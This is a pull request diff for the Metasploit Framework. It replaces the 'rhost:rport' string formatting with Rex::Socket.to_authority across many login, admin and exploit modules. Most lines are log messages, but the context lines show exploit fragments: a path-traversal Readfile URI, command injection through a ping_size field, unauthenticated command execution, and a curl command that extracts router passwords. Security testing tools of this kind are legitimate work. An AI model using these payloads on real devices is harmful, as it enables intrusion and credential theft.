### PR TITLE
#{rhost}:#{rport} -> #{Rex::Socket.to_authority(rhost, rport)}

### DIFF
--- a/docs/metasploit-framework.wiki/Creating-Metasploit-Framework-LoginScanners.md
+++ b/docs/metasploit-framework.wiki/Creating-Metasploit-Framework-LoginScanners.md
@@ -463,10 +463,10 @@ class Metasploit3 < Msf::Auxiliary
     write_check = scanner.send_cmd(['MKD', dir], true)
     if write_check and write_check =~ /^2/
       scanner.send_cmd(['RMD',dir], true)
-      print_status("#{rhost}:#{rport} - User '#{user}' has READ/WRITE access")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' has READ/WRITE access")
       return 'Read/Write'
     else
-      print_status("#{rhost}:#{rport} - User '#{user}' has READ access")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' has READ access")
       return 'Read-only'
     end
   end

--- a/lib/msf/core/auxiliary/cnpilot.rb
+++ b/lib/msf/core/auxiliary/cnpilot.rb
@@ -53,7 +53,7 @@ module Auxiliary::CNPILOT
       )
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return false
     end
 
@@ -65,11 +65,11 @@ module Auxiliary::CNPILOT
     )
 
     if good_response
-      print_good("#{rhost}:#{rport} - Cambium cnPilot confirmed...")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Cambium cnPilot confirmed...")
       run_login
       return true
     else
-      print_error("#{rhost}:#{rport} - Target does not appear to be Cambium cnPilot r200/r201. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Target does not appear to be Cambium cnPilot r200/r201. Module will not continue.")
       return false
     end
   end
@@ -79,7 +79,7 @@ module Auxiliary::CNPILOT
   #
 
   def do_login(user, pass)
-    print_status("#{rhost}:#{rport} - Attempting to login...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to login...")
 
     res = send_request_cgi(
       {
@@ -104,7 +104,7 @@ module Auxiliary::CNPILOT
     )
 
     if good_response
-      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+      print_good("SUCCESSFUL LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
 
       # Extract device model
       the_cookie = res.get_cookies
@@ -159,7 +159,7 @@ module Auxiliary::CNPILOT
         end
       end
     else
-      print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+      print_error("FAILED LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
       the_cookie = 'skip'
       cnpilot_version = 'skip'
       return the_cookie, cnpilot_version

--- a/lib/msf/core/auxiliary/epmp.rb
+++ b/lib/msf/core/auxiliary/epmp.rb
@@ -52,7 +52,7 @@ module Auxiliary::EPMP
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return false
     end
 
@@ -67,18 +67,18 @@ module Auxiliary::EPMP
       if !get_epmp_ver.nil?
         epmp_ver = get_epmp_ver[1]
         if !epmp_ver.nil?
-          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Cambium ePMP 1000 version #{epmp_ver}...")
           do_login(epmp_ver.to_s)
           return true
         else
-          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Cambium ePMP 1000...")
           epmp_ver = ''
           login(datastore['USERNAME'], datastore['PASSWORD'], epmp_ver)
           return true
         end
       end
     else
-      print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be Cambium ePMP 1000. Module will not continue.")
       return false
     end
   end
@@ -142,7 +142,7 @@ module Auxiliary::EPMP
       )
 
       if good_response
-        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_good("SUCCESSFUL LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
         report_cred(
           ip: rhost,
           port: rport,
@@ -177,7 +177,7 @@ module Auxiliary::EPMP
           return final_cookie, config_uri_dump_config, config_uri_reset_pass, config_uri_get_chart
         end
       else
-        print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_error("FAILED LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
         final_cookie = 'skip'
         config_uri_dump_config = 'skip'
         config_uri_reset_pass = 'skip'
@@ -247,7 +247,7 @@ module Auxiliary::EPMP
       )
 
       if good_response
-        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_good("SUCCESSFUL LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
         report_cred(
           ip: rhost,
           port: rport,
@@ -283,7 +283,7 @@ module Auxiliary::EPMP
           return final_cookie, config_uri_dump_config, config_uri_reset_pass, config_uri_get_chart, config_uri_ping
         end
       else
-        print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_error("FAILED LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
         final_cookie = 'skip'
         config_uri_dump_config = 'skip'
         config_uri_reset_pass = 'skip'

--- a/lib/msf/core/exploit/remote/afp.rb
+++ b/lib/msf/core/exploit/remote/afp.rb
@@ -81,7 +81,7 @@ module Exploit::Remote::AFP
       start = Time.now
       response = sock.timed_read(1024, datastore['LoginTimeOut'])
     rescue Timeout::Error
-      vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
+      vprint_error("AFP #{Rex::Socket.to_authority(rhost, rport)} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
       return :connection_error
     end
 
@@ -92,7 +92,7 @@ module Exploit::Remote::AFP
       return parse_login_response_add_send_login_count(response, {:p => p, :g => g, :ra => ra, :ma => ma,
         :password => pass, :user => user})
     when -5023 #kFPUserNotAuth (User doesn't exists)
-      print_status("AFP #{rhost}:#{rport} User #{user} doesn't exists")
+      print_status("AFP #{Rex::Socket.to_authority(rhost, rport)} User #{user} doesn't exists")
       return :skip_user
     else
       return :connection_error
@@ -129,7 +129,7 @@ module Exploit::Remote::AFP
     begin
       response = sock.timed_read(1024, datastore['LoginTimeOut'])
     rescue Timeout::Error
-      vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
+      vprint_error("AFP #{Rex::Socket.to_authority(rhost, rport)} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
       return :connection_error
     end
 
@@ -187,7 +187,7 @@ module Exploit::Remote::AFP
     begin
       response = sock.timed_read(1024, datastore['LoginTimeOut'])
     rescue Timeout::Error
-      vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
+      vprint_error("AFP #{Rex::Socket.to_authority(rhost, rport)} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
       return :connection_error
     end
 

--- a/lib/msf/core/exploit/remote/pop2.rb
+++ b/lib/msf/core/exploit/remote/pop2.rb
@@ -34,7 +34,7 @@ module Exploit::Remote::Pop2
   # message is read in and stored in the 'banner' attribute.
   #
   def connect(global = true)
-    print_status("Connecting to POP2 server #{rhost}:#{rport}...")
+    print_status("Connecting to POP2 server #{Rex::Socket.to_authority(rhost, rport)}...")
 
     fd = super
 

--- a/lib/msf/core/exploit/remote/real_port.rb
+++ b/lib/msf/core/exploit/remote/real_port.rb
@@ -44,7 +44,7 @@ module Exploit::Remote::RealPort
     return unless (res and res.length == 12)
 
     unless res[0,2] == "\xfc\x01"
-      vprint_error("#{rhost}:#{rport} Bad reply: #{res.inspect}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Bad reply: #{res.inspect}")
       return
     end
 
@@ -53,7 +53,7 @@ module Exploit::Remote::RealPort
 
     res = sock.get_once(len, 5)
     unless res.length == len
-      vprint_error("#{rhost}:#{rport} Bad length: #{res.length} wanted #{len}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} Bad length: #{res.length} wanted #{len}")
       return
     end
 

--- a/lib/msf/core/exploit/remote/smtp_deliver.rb
+++ b/lib/msf/core/exploit/remote/smtp_deliver.rb
@@ -144,7 +144,7 @@ module Exploit::Remote::SMTPDeliver
   end
 
   def connect_ehlo(global = true, domain)
-    vprint_status("Connecting to SMTP server #{rhost}:#{rport}...")
+    vprint_status("Connecting to SMTP server #{Rex::Socket.to_authority(rhost, rport)}...")
     nsock = connect(global)
 
     [nsock, smtp_send_recv("EHLO #{domain}\r\n", nsock)]

--- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb
+++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb
@@ -84,13 +84,13 @@ class MetasploitModule < Msf::Auxiliary
     packet << cmd
 
     begin
-      print_status("#{rhost}:#{rport} - Sending command...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending command...")
       connect
       sock.put(packet)
       res = sock.get_once
       print_status(res.to_s) if res && !res.empty?
     rescue StandardError
-      print_error("#{rhost}:#{rport} - Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
     ensure
       disconnect
     end

--- a/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb
+++ b/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
   def cmd_exec_run(the_cookie)
     # Verify backdoor 'root' shell url exists
     root_shell = (ssl ? 'https' : 'http').to_s + '://' + "#{rhost}:#{rport}" + '/adm/syscmd.asp'
-    print_status("#{rhost}:#{rport} - Checking backdoor 'root' shell...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking backdoor 'root' shell...")
 
     res = send_request_cgi(
       {
@@ -74,8 +74,8 @@ class MetasploitModule < Msf::Auxiliary
     if res && res.code == 200
       uri1 = '/goform/SystemCommand'
       inject_cmd = datastore['CMD']
-      print_good("#{rhost}:#{rport} - You can access the 'root' shell at: #{root_shell}")
-      print_good("#{rhost}:#{rport} - Executing command - #{inject_cmd}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - You can access the 'root' shell at: #{root_shell}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Executing command - #{inject_cmd}")
 
       send_request_cgi(
         {
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
         print_good("File saved in: #{p}")
       end
     else
-      print_error("#{rhost}:#{rport} - Backdoor 'root' shell not found. Affected versions are - v4.2.3-R4 and newer. You can try to verify the shell at #{root_shell}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Backdoor 'root' shell not found. Affected versions are - v4.2.3-R4 and newer. You can try to verify the shell at #{root_shell}")
       return
     end
   end
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Auxiliary
     elsif ['4.2.3-R4', '4.3.1-R1', '4.3.2-R4', '4.3.3-R4'].include?(cnpilot_version.to_s)
       cmd_exec_run(cookie)
     else
-      vprint_error("#{rhost}:#{rport} - This software version is not vulnerable. Affected versions are - v4.2.3-R4 and newer.")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - This software version is not vulnerable. Affected versions are - v4.2.3-R4 and newer.")
     end
   end
 end

--- a/modules/auxiliary/admin/http/cnpilot_r_fpt.rb
+++ b/modules/auxiliary/admin/http/cnpilot_r_fpt.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
   #
 
   def read_file(the_cookie)
-    print_status("#{rhost}:#{rport} - Accessing the file...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Accessing the file...")
     file = datastore['FILENAME']
     fileuri = "/goform/logRead?Readfile=../../../../../../..#{file}"
     final_url = (ssl ? 'https' : 'http').to_s + '://' + "#{rhost}:#{rport}" + fileuri.to_s
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
         print_good("File saved in: #{p}")
       end
     else
-      print_error("#{rhost}:#{rport} - Could not read file. You can manually check by accessing #{final_url}.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Could not read file. You can manually check by accessing #{final_url}.")
       return
     end
   end

--- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
+++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(_ip)
     tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.
 
-    print_status("Attempting to connect to #{rhost}:#{rport}")
+    print_status("Attempting to connect to #{Rex::Socket.to_authority(rhost, rport)}")
     res = send_request_raw(
       {
         'method' => 'POST',
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     if res && res.code == 500
-      print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
+      print_good("Request appears successful on #{Rex::Socket.to_authority(rhost, rport)}! Response: #{res.code}")
 
       file = send_request_raw(
         {
@@ -59,12 +59,12 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       if file && (file.code == 200)
-        print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
+        print_status("Request for #{datastore['FILE']} appears to have worked on #{Rex::Socket.to_authority(rhost, rport)}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
       elsif file && file.code
-        print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
+        print_error("Attempt returned HTTP error #{res.code} on #{Rex::Socket.to_authority(rhost, rport)} Response: \r\n#{res.body}")
       end
     elsif res && res.code
-      print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
+      print_error("Attempt returned HTTP error #{res.code} on #{Rex::Socket.to_authority(rhost, rport)} Response: \r\n#{res.body}")
     end
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
     vprint_error(e.message)

--- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
   def run
     uri = '/command.php'
 
-    print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending remote command: " + datastore['CMD'])
 
     data_cmd = "cmd=#{datastore['CMD']}; echo end"
 
@@ -65,16 +65,16 @@ class MetasploitModule < Msf::Auxiliary
       return if res.headers['Server'].nil? || res.headers['Server'] !~ %r{Linux,\ HTTP/1.1,\ DIR}
       return if res.code == 404
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return
     end
 
     if res.body.include?('end')
-      print_good("#{rhost}:#{rport} - Exploited successfully\n")
-      print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
-      print_line("#{rhost}:#{rport} - Output: #{res.body}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Exploited successfully\n")
+      print_line("#{Rex::Socket.to_authority(rhost, rport)} - Command: #{datastore['CMD']}\n")
+      print_line("#{Rex::Socket.to_authority(rhost, rport)} - Output: #{res.body}")
     else
-      print_error("#{rhost}:#{rport} - Exploit failed")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Exploit failed")
     end
   end
 end

--- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to access the configuration of the device")
 
     # Curl request:
     # curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep "\<name|password"
@@ -54,11 +54,11 @@ class MetasploitModule < Msf::Auxiliary
     return if (res.code == 404)
 
     if res.body =~ %r{<password>(.*)</password>}
-      print_good("#{rhost}:#{rport} - credentials successfully extracted")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - credentials successfully extracted")
 
       # store all details as loot -> there is some useful stuff in the response
       loot = store_loot('dlink.dir645.config', 'text/plain', rhost, res.body)
-      print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Account details downloaded to: #{loot}")
 
       res.body.each_line do |line|
         if line =~ %r{<name>(.*)</name>}
@@ -94,6 +94,6 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
   end
 end

--- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to access the configuration of the device")
 
     # download configuration
     res = send_request_cgi({
@@ -47,14 +47,14 @@ class MetasploitModule < Msf::Auxiliary
 
     if res.body =~ /sysPassword value/ || res.body =~ /sysUserName value/
       if res.body !~ /sysPassword value/
-        print_status("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")
       else
-        print_good("#{rhost}:#{rport} - Credentials successfully extracted")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Credentials successfully extracted")
       end
 
       # store all details as loot -> there is some useful stuff in the response
       loot = store_loot('dlink.dsl320b.config', 'text/plain', rhost, res.body)
-      print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Configuration of DSL 320B downloaded to: #{loot}")
 
       user = ''
       pass = ''
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
 
         pass = ::Regexp.last_match(1)
         pass = Rex::Text.decode_base64(pass)
-        print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Credentials found: #{user} / #{pass}")
 
         connection_details = {
           module_fullname: fullname,
@@ -83,6 +83,6 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
   end
 end

--- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
+++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
@@ -45,11 +45,11 @@ class MetasploitModule < Msf::Auxiliary
 
       if res && res.to_s =~ /Log out/
         print_status("Found valid session ID number #{x}!")
-        print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
+        print_status("Browse to http://#{Rex::Socket.to_authority(rhost, rport)}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
         break
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("Unable to connect to #{rhost}:#{rport}")
+      print_error("Unable to connect to #{Rex::Socket.to_authority(rhost, rport)}")
       break
     rescue ::Timeout::Error, ::Errno::EPIPE => e
       vprint_error(e.message)

--- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
     user = datastore['HttpUsername']
     pass = datastore['HttpPassword']
 
-    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
 
     begin
       res = send_request_cgi({
@@ -63,24 +63,24 @@ class MetasploitModule < Msf::Auxiliary
       return if (res.code == 404)
 
       if [200, 301, 302].include?(res.code)
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
-        print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - No successful login possible with #{user}/#{pass}")
         return
       end
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending remote command: " + datastore['CMD'])
 
     cmd = datastore['CMD']
     # original post request:
     # data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
     # action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
 
-    vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - using the following target URL: #{uri}")
     begin
       send_request_cgi({
         'uri' => uri,
@@ -99,10 +99,10 @@ class MetasploitModule < Msf::Auxiliary
         }
       })
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return
     end
-    print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
-    print_status("#{rhost}:#{rport} - Blind Exploitation - wait around 10 seconds till the command gets executed")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - wait around 10 seconds till the command gets executed")
   end
 end

--- a/modules/auxiliary/admin/http/telpho10_credential_dump.rb
+++ b/modules/auxiliary/admin/http/telpho10_credential_dump.rb
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Auxiliary
       return nil
     end
   rescue ::Rex::ConnectionError
-    print_error("#{rhost}:#{rport} - Failed to connect")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect")
     return nil
   end
 end

--- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
+++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
@@ -72,11 +72,11 @@ class MetasploitModule < Msf::Auxiliary
         }, 25
       )
       if res && (res.code == 200)
-        print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
+        print_status("Request ##{level} may have succeeded on #{Rex::Socket.to_authority(rhost, rport)}:file->#{files}! Response: \r\n#{res.body}")
         @files_found << files
         break
       elsif res && res.code
-        vprint_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
+        vprint_error("Attempt ##{level} returned HTTP error #{res.code} on #{Rex::Socket.to_authority(rhost, rport)}:file->#{files}")
       end
     end
   end
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(_ip)
     @files_found = []
 
-    print_status("Attempting to connect to #{rhost}:#{rport}")
+    print_status("Attempting to connect to #{Rex::Socket.to_authority(rhost, rport)}")
     res = send_request_raw(
       {
         'method' => 'GET',

--- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
+++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
@@ -69,17 +69,17 @@ class MetasploitModule < Msf::Auxiliary
       }, 25
     )
     if res && (res.code == 200)
-      print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
+      print_status("Request may have succeeded on #{Rex::Socket.to_authority(rhost, rport)}:file->#{files}! Response: \r\n#{res.body}")
       @files_found << files
     elsif res && res.code
-      vprint_status("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
+      vprint_status("Attempt returned HTTP error #{res.code} on #{Rex::Socket.to_authority(rhost, rport)}:file->#{files}")
     end
   end
 
   def run_host(_ip)
     @files_found = []
 
-    print_status("Attempting to connect to #{rhost}:#{rport}")
+    print_status("Attempting to connect to #{Rex::Socket.to_authority(rhost, rport)}")
     res = send_request_raw(
       {
         'method' => 'GET',

--- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
+++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
       jumpurl_enc = datastore['RFILE'].to_s
     end
 
-    print_status("Establishing a connection to #{rhost}:#{rport}")
+    print_status("Establishing a connection to #{Rex::Socket.to_authority(rhost, rport)}")
     print_status("Trying to retrieve #{datastore['RFILE']}")
     print_status('Rotating through possible weak encryption keys')
 
@@ -147,6 +147,6 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    print_error("#{rhost}:#{rport} [Typo3-SA-2009-001] Failed to retrieve file #{datastore['RFILE']}") unless success
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} [Typo3-SA-2009-001] Failed to retrieve file #{datastore['RFILE']}") unless success
   end
 end

--- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb
+++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
       jumpurl = datastore['RFILE'].to_s
     end
 
-    print_status("Establishing a connection to #{rhost}:#{rport}")
+    print_status("Establishing a connection to #{Rex::Socket.to_authority(rhost, rport)}")
     print_status("Trying to retrieve #{datastore['RFILE']}")
 
     location_base = Rex::Text.rand_text_numeric(1)
@@ -135,6 +135,6 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    print_error("#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}") unless success
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}") unless success
   end
 end

--- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb
+++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Auxiliary
       print_status('Performing downloading using HMAC_SHA1 style juHash creation - see show actions for more details')
     end
 
-    print_status("Establishing a connection to #{rhost}:#{rport}")
+    print_status("Establishing a connection to #{Rex::Socket.to_authority(rhost, rport)}")
     print_status("Trying to retrieve #{datastore['RFILE']}")
 
     if datastore['ENC_KEY'] != ''
@@ -199,7 +199,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     unless success
-      print_error("#{rhost}:#{rport} [Typo3] Failed to retrieve file #{datastore['RFILE']}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [Typo3] Failed to retrieve file #{datastore['RFILE']}")
       print_error("Maybe try checking the ACTIONS - Currently using  #{action.name}")
     end
   end

--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
     }.merge(service_details)
     create_credential_and_login(connection_details) # makes service_name more consistent
   rescue ::Rex::ConnectionError
-    print_error("#{rhost}:#{rport} - Failed to connect")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect")
     return
   end
 end

--- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     # Check connection and issue initial query
-    print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+    print_status("Attempting to connect to the database server at #{Rex::Socket.to_authority(rhost, rport)} as #{datastore['USERNAME']}...")
 
     unless mssql_login_datastore
       print_error('Login was unsuccessful. Check your credentials.')

--- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     # Check connection and issue initial query
-    print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
+    print_status("Attempting to connect to the database server at #{Rex::Socket.to_authority(rhost, rport)} as #{datastore['USERNAME']}...")
 
     unless mssql_login_datastore
       print_error('Login was unsuccessful. Check your credentials.')

--- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb
